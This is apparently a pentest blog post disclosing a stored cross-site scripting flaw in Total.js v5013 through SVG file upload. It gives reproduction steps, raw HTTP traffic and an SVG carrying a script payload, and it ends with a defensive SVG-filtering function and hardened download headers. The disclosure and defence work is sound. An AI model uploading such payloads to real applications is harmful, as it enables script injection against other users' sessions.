Sunday, 26 October 2025

Friday Fun Pentest Series - 46 - Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

Description

- It was noted that the application's file upload functionality was vulnerable to Stored Cross-Site Scripting (XSS) via an SVG image upload.


Stored Cross-Site Scripting (XSS) via SVG File Upload


Steps to Reproduce:
  1. Log in as a user and visit "Layouts"
  2. Visit "Files" and click "Upload"
  3. Upload SVG image file with the contents below
  4. The payload would execute upon clicking "Download"


// HTTP POST Request - Uploading SVG Image File

POST /admin/upload/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

------geckoformboundary6f751f7129e99de4fcc52bcce109c72
Content-Disposition: form-data; name="file0"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
------geckoformboundary6f751f7129e99de4fcc52bcce109c72--


// HTTP POST Response - Uploading SVG Image File

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 17:06:41 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 129

[{"id":"JE6g1R1cx61f","name":"evilsvgfile.svg","type":"image/svg+xml","ext":"svg","size":159,"url":"/download/JE6g1R1cx61f.svg"}]


// HTTP GET Request - Triggering the Payload

GET /download/JE6g1R1cx61f.svg HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]


// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
last-modified: Sun, 26 Oct 2025 17:06:41 GMT
x-size: 159
etag: 858100
content-type: image/svg+xml
Date: Sun, 26 Oct 2025 17:09:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 159

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
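
The download response above serves the stored file as image/svg+xml with no Content-Disposition or Content-Security-Policy header, so the browser renders it in the application's origin. The following is an added example, not code from the original post or from Total.js: a reject-on-suspicion check for uploaded SVGs and a set of hardened download headers, with all function and constant names hypothetical.

```javascript
// Added example (not Total.js code): a reject-on-suspicion gate for uploaded SVGs
// plus response headers for the download route. All names here are hypothetical.

// Constructed sample: the SVG body from the upload request above.
const SAMPLE_UPLOAD = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>`;

// Constructed sample: a harmless SVG that should pass the check.
const SAMPLE_CLEAN = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
<circle cx="5" cy="5" r="4" fill="teal"/></svg>`;

// Elements that can run script or embed foreign documents inside an SVG.
const BLOCKED_ELEMENTS = new Set([
  'script', 'foreignobject', 'iframe', 'object', 'embed', 'html', 'body', 'head',
]);

// Returns a list of reasons to reject; an empty list means nothing was flagged.
function findActiveSvgContent(svgText) {
  const reasons = [];
  // Every opening tag: optional namespace prefix, local name, attribute text.
  const tagRe = /<\s*(?:[\w.-]+:)?([A-Za-z][\w.-]*)([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(svgText)) !== null) {
    const name = m[1].toLowerCase();
    if (BLOCKED_ELEMENTS.has(name)) reasons.push(`element <${name}>`);
    // Inline event handlers such as onload= or onclick=.
    if (/\son[a-z]+\s*=/i.test(m[2])) reasons.push(`event handler on <${name}>`);
    // javascript: URLs in href or xlink:href.
    if (/href\s*=\s*["']?\s*javascript:/i.test(m[2])) reasons.push(`javascript: URL on <${name}>`);
  }
  // Entity declarations can hide markup from a text scan, so refuse them outright.
  if (/<!(DOCTYPE|ENTITY)/i.test(svgText)) reasons.push('DOCTYPE/ENTITY declaration');
  return reasons;
}

// Headers that keep a stored SVG from running script in the application's origin.
function svgDownloadHeaders(filename) {
  const safeName = filename.replace(/[^\w.-]/g, '_');
  return {
    'Content-Type': 'image/svg+xml',
    'Content-Disposition': `attachment; filename="${safeName}"`,
    'Content-Security-Policy': "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    'X-Content-Type-Options': 'nosniff',
  };
}
```

The scan is a conservative text heuristic meant to reject files, not to sanitize them; the response headers are the control that holds even when a file slips past it.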
